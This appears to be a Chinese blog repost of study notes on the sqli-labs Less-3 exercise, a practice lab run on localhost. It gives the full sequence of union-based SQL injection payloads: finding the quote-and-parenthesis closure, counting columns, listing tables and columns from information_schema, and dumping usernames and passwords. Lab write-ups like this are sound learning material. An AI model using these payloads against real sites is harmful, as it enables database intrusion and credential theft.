SQL练习(less-3)字符型注入& union联合查询

其他 2020-02-23 17:59:30 阅读次数: 0

本文为学习笔记,仅限学习交流
不得利用、从事危害国家或人民安全、荣誉和利益等活动

http://127.0.0.1/sqli/Less-3/?id=1
在这里插入图片描述
输入?Id=1’后报错
根据报错信息“1”)
去掉前后两个单引号,和自己输入的一个单引号后还有两个单引号和一个括号,可推出sql注入中的由单引号和括号的闭合模式。
在这里插入图片描述order by 3 查看显示位
(3)并不是固定的,要去试的
在这里插入图片描述
union select 查询显示位
在这里插入图片描述
联合查询语句:Union select 1,database(),version() 查询当前数据库名及版本号
在这里插入图片描述union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
联合查询,爆出数据库下的表名

在这里插入图片描述
union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’
查询users 表里的字段
在这里插入图片描述union select 1,group_concat(username),group_concat(password) from security.users
爆出用户,密码

在这里插入图片描述

AmyBaby囍
发布了43 篇原创文章 · 获赞 39 · 访问量 7613
私信 关注

猜你喜欢

转载自blog.csdn.net/AmyBaby00/article/details/100090192
今日推荐
Linus “吃狗粮”最积极!
开源日报 | Winamp播放器即将开源;生成式AI之战升级第二轮;Linus“吃狗粮”最积极;AI进入泡沫前期;吴泳铭为阿里云带来了什么?
NetBSD 禁止提交由 AI 生成的代码
Apache Doris 2.0.10 版本正式发布!
开源日报 | 大模型开战;大模型独角兽被曝卖身;周鸿祎建议谷歌开源所有产品;最大开源AI社区提供1000万美元共享GPU
开源日报 | Chrome内置Gemini的意义不在于Gemini;中国AI追随之路的五大误区;ECharts创始人“下海”养鱼;谷歌I/O开发者大会什么都有,只是没有惊喜
微软回应中国区AI团队“打包赴美”传闻
周排行
LogN级别的区间查询算法(线段树), 你学会了吗
数论概论(英文版.第4版)
idea 更新后和新的直接安装前,都需要配置 idea64.exe.vmoptions 后再使用
CANOpen系列教程04_CAN总线波特率、位时序、帧类型及格式说明
Java序列化基础
java排序算法整理
异常:org.apache.ibatis.reflection.ReflectionException
(算法练习)——二路归并排序
go 闭包函数
好程序员web前端技术分享媒体查询
每日归档
更多
2024-05-21(8)
2024-05-20(36)
2024-05-19(0)
2024-05-18(4)
2024-05-17(34)
2024-05-16(6)
2024-05-15(24)
2024-05-14(0)
2024-05-13(18)
2024-05-12(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022